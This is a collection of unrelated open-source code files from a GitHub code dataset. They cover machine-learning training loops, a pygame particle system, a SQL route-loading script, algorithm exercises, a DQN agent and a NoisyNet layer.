epoch {epoch+1} took {end-start} seconds\")\n\n with torch.no_grad():\n self.span_predictor.eval()\n self.gpt2.eval()\n\n print(f\"SpanOnly_trainer - evaluating loss on dev dataset... after epoch {epoch + 1}\")\n start = time.time()\n self.do_epoch(eval_ds_for_loss, epoch, self.eval_csv_logger, True)\n end = time.time()\n print(f\"SpanOnly_trainer - evaluation loss after epoch {epoch + 1} took {end - start} seconds\")\n\n if self.stop_as_negative_span and ((epoch + 1) % self.eval_frequency == 0):\n print(f\"SpanOnly_trainer (with stop_as_negative_span) - evaluating metrics on dev dataset... after epoch {epoch+1}\")\n start = time.time()\n _, scores = self.predictor.predict(eval_ds_for_metrics)\n end = time.time()\n print(f\"SpanOnly_trainer (with stop_as_negative_span) - evaluation metrics on dev dataset after epoch {epoch + 1} took {end - start} seconds\")\n\n print(f\"SpanOnly_trainer (with stop_as_negative_span) - scores on dev dataset after epoch {epoch + 1}: {scores}\")\n with open(self.evaluation_scores_file_path, \"a\") as f:\n f.write(f\"After span-only training epoch {epoch+1}: {json.dumps(scores)}\\n\")\n evaluation_labeled_f1_per_epoch.append(scores['labeled_f1'])\n evaluation_unlabeled_f1_per_epoch.append(scores['unlabeled_f1'])\n \n if epochs > 0 and self.stop_as_negative_span and evaluation_labeled_f1_per_epoch:\n best_epoch_for_labeled_f1 = evaluation_labeled_f1_per_epoch.index(max(evaluation_labeled_f1_per_epoch)) + 1\n best_epoch_for_unlabeled_f1 = evaluation_unlabeled_f1_per_epoch.index(max(evaluation_unlabeled_f1_per_epoch)) + 1\n with open(self.evaluation_scores_file_path, \"a\") as f:\n f.write(f\"Best epoch for labeled f1 after span-only training: {best_epoch_for_labeled_f1}\\n\")\n f.write(f\"Best epoch for unlabeled f1 after span-only training: {best_epoch_for_unlabeled_f1}\\n\")\n","repo_name":"shimooper/TNE_GPT2","sub_path":"trainers/span_only_trainer.py","file_name":"span_only_trainer.py","file_ext":"py","file_size_in_byte":8205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7385712811","text":"import pygame\nfrom pygame.math import Vector2\n\nimport random\n\nclass Particles:\n def __init__(self, sizeRange, posRange, circle=False, speed=10, accel=Vector2(0, 0), collision=False, colors=None):\n self.sizeRange, self.posRange = sizeRange, posRange\n self.circle, self.speed, self.accel, self.collision = circle, speed, accel, collision\n if colors is None: self.colors = [(255,255,255)]\n else: self.colors = tuple(colors)\n\n # Data for particles\n self.pos = []\n self.siz = [] # Radius\n self.vel = []\n self.col = []\n\n def draw(self, win, scroll=Vector2(0, 0)):\n if self.circle:\n for i in range(len(self.pos)):\n pygame.draw.circle(win, self.colors[self.col[i]], self.pos[i]-scroll, self.siz[i])\n else:\n for i in range(len(self.pos)):\n pygame.draw.rect(win, self.colors[self.col[i]], \\\n (self.pos[i].x - self.siz[i] - scroll.x, \\\n self.pos[i].y - self.siz[i] - scroll.y, \\\n self.siz[i] * 2, self.siz[i] * 2))\n\n def update(self, delta, tilemap=None, colRects=None):\n if colRects is None: colRects = []\n for i in range(len(self.pos))[::-1]:\n self.vel[i] += self.accel * delta\n\n if self.collision:\n self.pos[i].x += self.vel[i].x * delta\n if tilemap.collidePoint(self.pos[i]) or \\\n any([rect.collidepoint(self.pos[i]) for rect in colRects]):\n self.vel[i].x *= -1\n self.pos[i].x += self.vel[i].x * 2 * delta\n \n self.pos[i].y += self.vel[i].y * delta\n if tilemap.collidePoint(self.pos[i]):\n self.vel[i].y *= -random.uniform(0.75, 1)\n self.pos[i].y += self.vel[i].y * 2 * delta\n else:\n self.pos[i] += self.vel[i] * delta\n\n self.siz[i] -= self.speed * delta\n\n if self.siz[i] < 1:\n self.pos.pop(i)\n self.siz.pop(i)\n self.vel.pop(i)\n self.col.pop(i)\n\n def emit(self, pos, amount, velRange):\n num = amount if amount >= 1 else random.random() > amount\n for i in range(num):\n self.pos.append(pos + Vector2(random.uniform(*self.posRange[:2]), random.uniform(*self.posRange[2:])))\n self.siz.append(random.uniform(*self.sizeRange))\n self.vel.append(Vector2(random.uniform(*velRange[:2]), random.uniform(*velRange[2:])))\n self.col.append(random.randrange(0, len(self.colors)))\n \n def clear(self):\n while len(self.pos):\n self.pos.pop()\n self.siz.pop()\n self.vel.pop()\n self.col.pop()\n\n def collideRect(self, rect):\n for pos in self.pos:\n if rect.collidepoint(pos): return True\n return False","repo_name":"Magicalbat/Pygame-Projects","sub_path":"Metroidvania-Month-15/src/utils/particles.py","file_name":"particles.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17334376625","text":"# -*- coding: utf-8 -*-\n\n'''Заполняет БД маршрутами из файлы-справочника типа *.csv\n Читаем строку справочного файла и проверяем аэропорты.\n Если все есть, то смотрим в БД такой маршрут по кодам IATA аэропортов.\n Если такого маршрута нет, добавляем его.\n Прежние маршруты остаются без изменений\n\n --- На больших входных файлах наблюдается постепенная значительная утечка ОЗУ ---\n'''\n\n\nimport pyodbc\nimport pandas\n\n\nmyDriver = \"SQL Server\"\nmyServer = \"Data-Server\"\nmyDataBase = \"AirLines\"\n\n# Открываем соединение с БД. Значение AUTOCOMMIT берет из БД (там по-умолчанию FALSE)\ncnxn = pyodbc.connect(driver=myDriver, server=myServer, database=myDataBase)\n\n# Ставим курсор на начало\nseek = cnxn.cursor()\n\n# Читаем справочный файл типа *.csv (UTF-8, шапка таблицы, разделитель - |) и перепаковываем его в DataFrame\n# В исходном файле *.csv подписаны столбцы -> в DataFrame можно пока обращаться к именам столбцов\n\n'''\n# Источник OpenFlights\nDataFrameFromCSV = pandas.read_csv(\"Routes.csv\", sep=\"|\")\nListAirLine = DataFrameFromCSV['AirLine'].tolist()\nListAirPortSource = DataFrameFromCSV['AirPortSource'].tolist() # используется как длина списков\nListAirPortDestination = DataFrameFromCSV['AirPortDestination'].tolist()\nListStops = DataFrameFromCSV['Stops'].tolist()\nListEquipment = DataFrameFromCSV['Equipment'].tolist()'''\n\n# Источник BTSgov\nDataFromCSV = pandas.read_csv(\"1007531840_T_DB1B_COUPON.csv\", sep=\",\")\nListAirPortSource = DataFromCSV['ORIGIN'].tolist()\nListAirPortDestination = DataFromCSV['DEST'].tolist()\n\n# Счетчики\nCount_index = 0\nCountNotChecked = 0\nCountAdded = 0\nCountFailed = 0\n\n# Делаем проход по таблице Если такой уже есть, переходим на следующую строку DataFrame-а\nwhile Count_index < len(ListAirPortSource):\n # Становимся на строку с номером Count_index\n myQueryAirPortSource = \"SELECT * FROM dbo.AirPortsTableNew WHERE AirPortCodeIATA = '\" + str(ListAirPortSource[Count_index]) + \"'\"\n seek.execute(myQueryAirPortSource)\n ResultSQLQueryAirPortSource = seek.fetchall()\n if not ResultSQLQueryAirPortSource:\n print(\" ... Аэропорта \", str(ListAirPortSource[Count_index]), \" в БД пока нет, добавить маршрут не получится ...\")\n myQueryAirPortDestination = \"SELECT * FROM dbo.AirPortsTableNew WHERE AirPortCodeIATA = '\" + str(ListAirPortDestination[Count_index]) + \"'\"\n seek.execute(myQueryAirPortDestination)\n ResultSQLQueryAirPortDestination = seek.fetchall()\n if not ResultSQLQueryAirPortDestination:\n print(\" ... Аэропорта \", str(ListAirPortDestination[Count_index]), \" в БД пока нет, добавить маршрут не получится ...\")\n if ResultSQLQueryAirPortSource and ResultSQLQueryAirPortDestination:\n # В таблице \"AirRoutesTableNew\" два внешних ключа на один первичный ключ и сделано условие \"AirPortSource\" не равно \"AirPortDestination\"\n myQueryRoute = \"\"\"SELECT dbo.AirRoutesTableNew.AirRouteUniqueNumber AS AIRROUTE,\n dbo.AirPortsTableNew.AirPortName AS DEPARTURE,\n AirPortsTableNew_1.AirPortName AS ARRIVAL,\n dbo.AirRoutesTableNew.CodeShape,\n dbo.AirRoutesTableNew.Stops,\n dbo.AirRoutesTableNew.Equipment,\n dbo.AirPortsTableNew.AirPortCodeIATA AS Departure_IATA,\n AirPortsTableNew_1.AirPortCodeIATA AS Arrival_IATA \n FROM dbo.AirRoutesTableNew INNER JOIN\n dbo.AirPortsTableNew ON dbo.AirRoutesTableNew.AirPortDeparture = dbo.AirPortsTableNew.AirPortUniqueNumber INNER JOIN\n dbo.AirPortsTableNew AS AirPortsTableNew_1 ON dbo.AirRoutesTableNew.AirPortArrival = AirPortsTableNew_1.AirPortUniqueNumber\n WHERE (dbo.AirPortsTableNew.AirPortCodeIATA = '\"\"\" + str(ListAirPortSource[Count_index]) + \"') AND (AirPortsTableNew_1.AirPortCodeIATA = '\" + str(ListAirPortDestination[Count_index]) + \"') COMMIT\"\n try:\n seek.execute(myQueryRoute) # ---- здесь скрипт слетает ---\n except:\n print(\" ... -- условие не проверено --\")\n Count_index += 1\n CountNotChecked += 1\n continue\n ResultSQLQueryRoute = seek.fetchall()\n if ResultSQLQueryRoute:\n # Такой маршрут есть в БД\n print(\"Маршрут есть, не меняем\")\n else:\n # Такого маршрута нет в БД. Добавляем его\n print(\"Маршрут в БД не найден, добавляем его\")\n myQueryInsert = \"BEGIN TRANSACTION \"\n myQueryInsert += \"INSERT INTO dbo.AirRoutesTableNew (AirPortDeparture, AirPortArrival, Stops, Equipment) VALUES (\"\n myQueryInsert += \"(SELECT AirPortUniqueNumber FROM dbo.AirPortsTableNew WHERE AirPortCodeIATA = '\" + str(ListAirPortSource[Count_index]) + \"'), \" # nchar(10)\n myQueryInsert += \"(SELECT AirPortUniqueNumber FROM dbo.AirPortsTableNew WHERE AirPortCodeIATA = '\" + str(ListAirPortDestination[Count_index]) + \"'), \" # nchar(10)\n #myQueryInsert += str(ListStops[Count_index]) + \", \" # smallint\n myQueryInsert += \"0, \" # smallint\n #myQueryInsert += \"'\" + str(ListEquipment[Count_index]) + \"')\" # ntext\n myQueryInsert += \"'-+- OpenFlights -+-') \" # ntext\n myQueryInsert += \"COMMIT TRANSACTION \"\n try:\n seek.execute(myQueryInsert)\n CountAdded += 1\n except:\n print(\" ..-- Маршрут не вставился .....\")\n CountFailed += 1\n Count_index += 1\n\n# Если заполение велось с помощью этой обработки, повторов не будет\n\n# Снимаем курсор\nseek.close()\n\n# Заканчиваем висящие транзакции\ncnxn.commit()\n# Закрываем соединение\ncnxn.close()\n\n# Выводим итоги\nprint(\"\\n Итоги:\\n ----\")\nprint(\" Просмотрено \", str(Count_index), \" записей в справочном файле\")\nprint(\" Не проверено \", str(CountNotChecked), \" записей\")\nprint(\" Добавлено \", str(CountAdded), \" авиалиний\")\nprint(\" Не добавлено\", str(CountFailed), \" авиалиний\")\n","repo_name":"tsv19su254052/LoadWorkData-GUIs-and-Utilities","sub_path":"LoadAirRoutesOLD1.py","file_name":"LoadAirRoutesOLD1.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28006456576","text":"from .image import Image\nfrom .cameras import Camera\n\nclass Renderer:\n def __init__(self, camera: Camera, integrator):\n self.camera = camera\n self.integrator = integrator\n\n def render(self, texture: Image) -> None:\n for y in range(texture.height):\n for x in range(texture.width):\n rx, ry = 2.0 * x / (texture.width-1) - 1.0, 2.0 * y / (texture.height-1) - 1.0\n\n ray = self.camera.get_primary_ray(rx, ry)\n texture[x, y] = self.integrator.get_radiance(ray).trim()\n ","repo_name":"pkubiak/sh-dungeon","sub_path":"engine/rt/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"18956166691","text":"from lib.model import Model\n\nfrom of_switch.of_switch import OpenflowSwitch\nfrom clients.replier import Replier \nfrom clients.sym_exec_sender import SymExecSender\nfrom of_controller.nox_controller import PySwitchController\n\nfrom invariants.no_loop_invariant import NoLoopInvariant\nfrom invariants.strict_direct_route_invariant import StrictDirectRouteInvariant\n\nimport config_parser as config\n\nclass NiceModel(Model):\n generate_inputs = True\n generate_stats = False\n invariants = [NoLoopInvariant, StrictDirectRouteInvariant]\n\n def initTopology(self, topo):\n self.controller = PySwitchController()\n sw1 = OpenflowSwitch(name=\"s1\", port_count=2, of_id=1, expire_entries=config.get(\"model.flow_entry_expiration\"))\n sw2 = OpenflowSwitch(name=\"s2\", port_count=2, of_id=2, expire_entries=config.get(\"model.flow_entry_expiration\"))\n cl1 = SymExecSender(name=\"h1\", mymac=(0x00, 0xBA, 0xAD, 0xF0, 0x0D, 0x01), max_pkts=config.get(\"nice_model.max_pkts\"), max_burst=config.get(\"nice_model.max_burst\"))\n cl2 = Replier(name=\"h2\", mymac=(0x00, 0x01, 0x02, 0x03, 0x04, 0x05))\n sw1.initTopology({0: (cl1, 0), 1: (sw2, 0)})\n sw2.initTopology({0: (sw1, 1), 1: (cl2, 0)})\n cl1.initTopology({0: (sw1, 0)})\n cl2.initTopology({0: (sw2, 1)})\n self.clients.append(cl1)\n self.clients.append(cl2)\n self.switches.append(sw1)\n self.switches.append(sw2)\n self.switches_idx[sw1.getOpenflowID()] = sw1\n self.switches_idx[sw2.getOpenflowID()] = sw2\n # start callbacks\n self.controller.start_callbacks.append(lambda: self.controller.install())\n self.controller.start_callbacks.append(lambda: self.controller.addSwitch(sw1))\n self.controller.start_callbacks.append(lambda: self.controller.addSwitch(sw2))\n\n","repo_name":"mcanini/nice","sub_path":"model_checker/models/nice_model.py","file_name":"nice_model.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"18350343896","text":"import numpy as np\nimport sys\nimport math\nfrom timeit import default_timer as timer\nfrom datetime import timedelta\n\ndef findmaximumcrossingsubarray(A, low, mid, high):\n \"\"\"Find the maximum subarray of A[low] to A[high] crossing index mid.\n\n \"\"\"\n\n #error checks should be here (omitted)\n #e.g. low <= mid <= high\n #what happens if low == mid or high == mid?\n\n leftsum = float('-Inf')\n sum = 0\n for i in range(mid, low-1, -1):\n sum += A[i]\n if (sum > leftsum):\n leftsum = sum\n left = i\n \n rightsum = float('-Inf')\n sum = 0\n for j in range(mid+1, high+1):\n sum += A[j]\n if (sum > rightsum):\n rightsum = sum\n right = j\n \n return left, right, leftsum + rightsum\n\ndef findmaximumsubarray(A, low, high):\n \"\"\"Find the maximum subarray of A[low] to A[high].\n\n Recursive implementation using divide-and-conquer.\n \"\"\"\n\n #error checks should be here (omitted)\n\n if (high > low):\n mid = int(math.floor(high+low)/2)\n leftlow, lefthigh, leftsum = findmaximumsubarray(A,low,mid)\n rightlow, righthigh, rightsum = findmaximumsubarray(A, mid+1, high)\n crosslow, crosshigh, crosssum = findmaximumcrossingsubarray(A, low, mid, high)\n if (leftsum >= rightsum and leftsum >= crosssum):\n return leftlow, lefthigh, leftsum\n elif (rightsum >= crosssum):\n return rightlow, righthigh, rightsum\n else:\n return crosslow, crosshigh, crosssum\n else:\n return low, high, A[low]\n\ndef bruteforcemaximumsubarray(A):\n \"\"\"Find the maximum subarray of A.\n\n Brute force implementation checking all possibilities\n \"\"\"\n\n maxsum = float('-Inf')\n \n for i in range(0, len(A)):\n for j in range(0, len(A)): #could be improved\n sum = 0\n for k in range(i, j+1): #but this omits cases j < i\n sum += A[k]\n \n if sum > maxsum:\n maxsum = sum\n left = i\n right = j\n \n return left, right, maxsum\n \ndef kadanemaximumsubarray(A):\n \"\"\"Find the maximum subarray of A.\n\n Kadane's algorithm\n \"\"\"\n maxsum = float('-Inf')\n bestleft = bestright = 0\n sum = 0\n for right in range(0, len(A)):\n if sum <= 0:\n # Start a new sequence at the current element\n left = right\n sum = A[left]\n else:\n # Extend the existing sequence with the current element\n sum += A[right]\n\n if sum > maxsum:\n maxsum = sum\n bestleft = left\n bestright = right\n\n return bestleft, bestright, maxsum\n \n#main point of entry\nn = 300\nA = np.random.randint(-10,10,n)\n\nstart_time = timer()\n[left, right, sum] = findmaximumsubarray(A, 0, n-1)\nend_time = timer();\nprint(\"Divide-and-conquer time = \", timedelta(seconds=end_time-start_time))\n\nbf_start_time = timer()\n[bf_left, bf_right, bf_sum] = bruteforcemaximumsubarray(A);\nbf_end_time = timer()\nprint(\"Brute-force time = \", timedelta(seconds=bf_end_time-bf_start_time))\n\nkadane_start_time = timer()\n[kadane_left, kadane_right, kadane_sum] = kadanemaximumsubarray(A);\nkadane_end_time = timer()\nprint(\"Kadane time = \", timedelta(seconds=kadane_end_time-kadane_start_time))\n\nprint(\"Maximum subarray sum = \", sum, \" from \" , left, \" to \", right)\nprint(\"Maximum brute force subarray sum = \", bf_sum, \" from \" , bf_left, \" to \", bf_right)\nprint(\"Maximum kadane subarray sum = \", kadane_sum, \" from \" , kadane_left, \" to \", kadane_right)\n\n\n\n\n\n\n\n","repo_name":"samib1/Useful-Algorithms","sub_path":"1_MaximumSubarray.py","file_name":"1_MaximumSubarray.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18215954092","text":"class Solution:\n def nearestExit(self, maze: List[List[str]], entrance: List[int]) -> int:\n m = len(maze)\n n = len(maze[0])\n dirs = [0, 1, 0, -1, 0]\n ans = 0\n q = collections.deque([(entrance[0], entrance[1])])\n seen = {(entrance[0], entrance[1])}\n\n while q:\n ans += 1\n for _ in range(len(q)):\n i, j = q.popleft()\n for k in range(4):\n x = i + dirs[k]\n y = j + dirs[k + 1]\n if x < 0 or x == m or y < 0 or y == n:\n continue\n if (x, y) in seen or maze[x][y] == '+':\n continue\n if x == 0 or x == m - 1 or y == 0 or y == n - 1:\n return ans\n q.append((x, y))\n seen.add((x, y))\n\n return -1\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1926. Nearest Exit from Entrance in Maze/1926.py","file_name":"1926.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"73451755571","text":"# all accpeted\n\nimport sys\n\ndef format_time_stamp(time_stamp:str):\n l = sorted([int(i) for i in time_stamp.split(':')], reverse = 1)\n return sum([l[i] * 60**i for i in range(3)])\n\nN = int(input())\nminimum = sys.maxsize\nmaximum = -sys.maxsize\nmin_name = None\nmax_name = None\n\nfor _ in range(N):\n name, enter, leave = input().split()\n enter, leave = [format_time_stamp(i) for i in [enter, leave]]\n if enter < minimum:\n minimum = enter\n min_name = name\n if leave > maximum:\n maximum = leave\n max_name = name\n\nprint(min_name, max_name)","repo_name":"git-thinker/PTA","sub_path":"PAT (Advanced Level) Practice/1006 Sign In and Sign Out.py","file_name":"1006 Sign In and Sign Out.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1648763266","text":"import sys\nimport gym\nimport pylab\nimport random\nimport numpy as np\nimport time\nfrom collections import deque\n\nimport torch as torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nclass Net(nn.Module):\n def __init__(self, input_size, output_size):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(input_size, 128)\n self.fc2 = nn.Linear(128, 128)\n self.fc2_1 = nn.Linear(128, 128)\n self.fc3 = nn.Linear(128, output_size)\n self.initweight()\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = F.relu(self.fc2_1(x))\n x = self.fc3(x)\n return x\n \n def initweight(self):\n torch.nn.init.xavier_uniform_(self.fc1.weight).to(device)\n torch.nn.init.xavier_uniform_(self.fc2.weight).to(device)\n torch.nn.init.xavier_uniform_(self.fc2_1.weight).to(device)\n torch.nn.init.xavier_uniform_(self.fc3.weight).to(device)\n\nEPISODES = 500\n# 카트폴 예제에서의 DQN 에이전트\n\n\nclass DQNAgent:\n def __init__(self, state_size, action_size):\n self.render = True\n self.load_model = False\n\n # 상태와 행동의 크기 정의\n self.state_size = state_size\n self.action_size = action_size\n\n # DQN 하이퍼파라미터\n self.discount_factor = 0.99\n self.learning_rate = 0.001\n self.epsilon = 1.0\n self.epsilon_decay = 0.999\n self.epsilon_min = 0.001\n self.batch_size = 500\n self.train_start = 2000\n\n # 리플레이 메모리, 최대 크기 2000\n self.memory = deque(maxlen=3000)\n\n # 모델과 타깃 모델 생성\n self.model = Net(self.state_size, self.action_size).to(device)\n self.target_model = Net(self.state_size, self.action_size).to(device)\n\n self.criterion = nn.MSELoss().to(device)\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.learning_rate)\n\n # 타깃 모델 초기화\n self.update_target_model()\n\n #if self.load_model:\n # self.model.load_weights(\"./save_model/cartpole_dqn_trained.h5\")\n\n # 타깃 모델을 모델의 가중치로 업데이트\n def update_target_model(self):\n self.target_model.load_state_dict(self.model.state_dict())\n #weight.data 는 뭐지...\n\n # 입실론 탐욕 정책으로 행동 선택\n def get_action(self, state):\n if np.random.rand() <= self.epsilon:\n # 무작위 행동 반환\n return torch.tensor([[random.randrange(self.action_size)]], device=device, dtype=torch.long)\n else:\n with torch.no_grad():\n # 모델로부터 행동 산출\n state = torch.FloatTensor(state).to(device)\n return self.model(state)[0].argmax()\n\n # 샘플 을 리플레이 메모리에 저장\n def append_sample(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n\n # 리플레이 메모리에서 무작위로 추출한 배치로 모델 학습\n def train_model(self):\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n # 메모리에서 배치 크기만큼 무작위로 샘플 추출\n mini_batch = random.sample(self.memory, self.batch_size)\n\n states = np.zeros((self.batch_size, self.state_size))\n next_states = np.zeros((self.batch_size, self.state_size))\n actions, rewards, dones = [], [], []\n\n for i in range(self.batch_size):\n states[i] = mini_batch[i][0]\n actions.append(mini_batch[i][1])\n rewards.append(mini_batch[i][2])\n next_states[i] = mini_batch[i][3]\n dones.append(mini_batch[i][4])\n\n # 현재 상태에 대한 모델의 큐함수\n # 다음 상태에 대한 타깃 모델의 큐함수\n states = torch.FloatTensor(states).to(device)\n next_states = torch.FloatTensor(next_states).to(device)\n actions = torch.LongTensor(actions).unsqueeze(1).to(device)\n rewards = torch.FloatTensor(rewards).to(device)\n dones = torch.FloatTensor(dones).to(device)\n\n output = self.model(states).gather(1, actions)\n target = self.target_model(next_states).max(1)[0].detach()\n target = rewards + self.discount_factor * dones * target\n\n self.optimizer.zero_grad()\n loss = self.criterion(output.squeeze(), target)\n loss.backward()\n self.optimizer.step()\n\n\nif __name__ == \"__main__\":\n # CartPole-v1 환경, 최대 타임스텝 수가 500\n env = gym.make('CartPole-v1')\n state_size = env.observation_space.shape[0]\n action_size = env.action_space.n\n\n # DQN 에이전트 생성\n agent = DQNAgent(state_size, action_size)\n\n scores, episodes, steps = [], [], []\n\n for e in range(EPISODES):\n done = False\n score = 0\n step_size = 0\n # env 초기화\n state = env.reset()\n state = np.reshape(state, [1, state_size])\n\n while not done:\n # 현재 상태로 행동을 선택\n action = agent.get_action(state).item()\n # 선택한 행동으로 환경에서 한 타임스텝 진행\n next_state, reward, done, info = env.step(action)\n next_state = np.reshape(next_state, [1, state_size])\n #reward = (-abs(state[0][2])*100 + 5)\n # 에피소드가 중간에 끝나면 -100 보상\n reward = reward if not done or step_size >= 499 else -100\n\n # 리플레이 메모리에 샘플 저장\n agent.append_sample(state, action, reward, next_state, not done)\n # 매 타임스텝마다 학습\n if len(agent.memory) >= agent.train_start:\n if agent.render:\n env.render()\n agent.train_model()\n\n score += reward\n state = next_state\n step_size += 1\n\n if done:\n # 각 에피소드마다 타깃 모델을 모델의 가중치로 업데이트\n agent.update_target_model()\n\n #score = score if score == 500 else score + 100\n # 에피소드마다 학습 결과 출력\n scores.append(score)\n episodes.append(e)\n steps.append(step_size)\n pylab.plot(episodes, steps, 'b')\n pylab.savefig(\"./save_graph/cartpole_dqn.png\")\n print(\"episode:\", e, \" score:\", score, \" memory length:\",\n len(agent.memory), \" epsilon:\", agent.epsilon, \" step:\", step_size)\n\n # 이전 10개 에피소드의 점수 평균이 490보다 크면 학습 중단\n #if np.mean(scores[-min(10, len(scores)):]) > 490:\n # agent.model.save_weights(\"./save_model/cartpole_dqn.h5\")\n # sys.exit()\n","repo_name":"Skyrich2000/TorchStudy","sub_path":"dpn/agent_torch.py","file_name":"agent_torch.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20727351542","text":"import io\nfrom operator import mod\nimport sys\n\n# 再帰用\n# sys.setrecursionlimit(10**9)\n\n\n_INPUT = \"\"\"\\\n27\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n# ---------------------------------\n\nB = int(input())\na = 1\nwhile a**a <= B:\n if a**a == B:\n print(a)\n exit()\n a += 1\nprint(-1)\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"contest/abc327/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34216622853","text":"from scipy.stats import spearmanr, pearsonr, kendalltau\nimport sys\nimport pandas as pd\n\nresults_file = sys.argv[1]\nresults = pd.read_csv(results_file, sep=\"\\t\")\nsimilarity = results['R score'].tolist()\nscore = results[\"score\"].tolist()\n\nscorr = spearmanr(similarity, score)\n# print(\"File:\", results_file)\nprint(\"Spearman Rank Correlation:{0:6.3f}\".format(scorr.correlation))\nif (scorr.pvalue >= 0.001):\n\tprint(\"P-value:{0:6.3f}\".format(scorr.pvalue))\nelse:\n\tprint(\"P-value:{0:10.3e}\".format(scorr.pvalue))\npcorr = pearsonr(similarity, score)\nprint(\"Pearson Correlation Coefficient:{0:6.3f}\".format(pcorr[0]))\nif (pcorr[1] >= 0.001):\n\tprint(\"P-value:{0:6.3f}\".format(pcorr[1]))\nelse:\n\tprint(\"P-value:{0:10.3e}\".format(pcorr[1]))\nkentau = kendalltau(similarity, score)\nprint(\"Kendall Rank Correlation :{0:6.3f}\".format(kentau[0]))\nif (kentau[1] >= 0.001):\n\tprint(\"P-value:{0:6.3f}\".format(kentau[1]))\nelse:\n\tprint(\"P-value:{0:10.3e}\".format(kentau[1]))\n","repo_name":"EshwarSR/AutomaticEvaluationMetrics","sub_path":"1_BERTScore/corr.py","file_name":"corr.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74600396531","text":"import numpy as np\nimport tensorflow as tf\n\nfrom DeepAgent.interfaces.ibaseNetwork import BaseNetwork\n\n\nclass NoisyNet(BaseNetwork):\n\n def __init__(self, dense_layers=None, **kwargs):\n\n super(NoisyNet, self).__init__(dense_layers=dense_layers, **kwargs)\n if dense_layers is None:\n self.dense_layers = None\n self.build()\n\n def build(self):\n\n model_input = tf.keras.layers.Input(shape=(self.input_shape[0], self.input_shape[1], self.frame_stack))\n scale = tf.keras.layers.Lambda(lambda p: p / 255.0)(model_input)\n\n conv_layers = []\n\n for layer_id in tf.range(len(self.conv_layers['filters'])):\n if layer_id == 0:\n conv_input = scale\n else:\n conv_input = conv_layers[-1]\n\n conv_layers.append(tf.keras.layers.Conv2D(filters=self.conv_layers['filters'][layer_id],\n kernel_size=self.conv_layers['kernel_sizes'][layer_id],\n strides=self.conv_layers['strides'][layer_id],\n padding=self.conv_layers['paddings'][layer_id],\n activation=self.conv_layers['activations'][layer_id],\n kernel_initializer=self.conv_layers['initializers'][layer_id],\n name=self.conv_layers['names'][layer_id],\n use_bias=False\n )(conv_input))\n\n if self.dense_layers is None:\n value_stream, advantage_stream = tf.split(conv_layers[-1], 2, 3)\n value_stream = tf.keras.layers.Flatten()(value_stream)\n advantage_stream = tf.keras.layers.Flatten()(advantage_stream)\n else:\n dense_layers = []\n\n for layer_id in tf.range(len(self.dense_layers['units'])):\n if layer_id == 0:\n dense_input = tf.keras.layers.Flatten()(conv_layers[-1])\n else:\n dense_input = dense_layers[-1]\n\n dense_layers.append(NoisyDense(\n units=self.dense_layers['units'][layer_id],\n name=self.dense_layers['names'][layer_id]\n )(dense_input))\n dense_layers.append(tf.keras.activations.get(\n self.dense_layers['activations'][layer_id]\n )(dense_layers[-1]))\n\n value_stream = dense_layers[-1]\n advantage_stream = dense_layers[-1]\n\n value_layer_2 = NoisyDense(units=1, name='value_layer')(value_stream)\n\n advantage_layer_2 = NoisyDense(units=self.n_actions, name='advantage_layer')(advantage_stream)\n\n out_layer = value_layer_2 + tf.math.subtract(advantage_layer_2,\n tf.reduce_mean(advantage_layer_2, axis=1,\n keepdims=True))\n\n model = tf.keras.models.Model(inputs=[model_input], outputs=[out_layer])\n self.model = model\n super().build()\n\n\nclass NoisyDense(tf.keras.layers.Layer):\n\n def __init__(self, units, std_init=0.5, **kwargs):\n super(NoisyDense, self).__init__(**kwargs)\n\n self.units = units\n\n self.std_init = std_init\n\n def build(self, input_shape):\n assert len(input_shape) >= 2\n input_dim = input_shape[-1]\n\n self.reset_noise(input_dim)\n\n mu_range = 1 / np.sqrt(input_dim)\n mu_initializer = tf.random_uniform_initializer(-mu_range, mu_range)\n sigma_initializer = tf.constant_initializer(self.std_init / np.sqrt(self.units))\n\n self.weight_mu = tf.Variable(initial_value=mu_initializer(shape=(input_dim, self.units), dtype='float32'),\n trainable=True)\n\n self.weight_sigma = tf.Variable(initial_value=sigma_initializer(shape=(input_dim, self.units), dtype='float32'),\n trainable=True)\n\n self.bias_mu = tf.Variable(initial_value=mu_initializer(shape=(self.units,), dtype='float32'),\n trainable=True)\n\n self.bias_sigma = 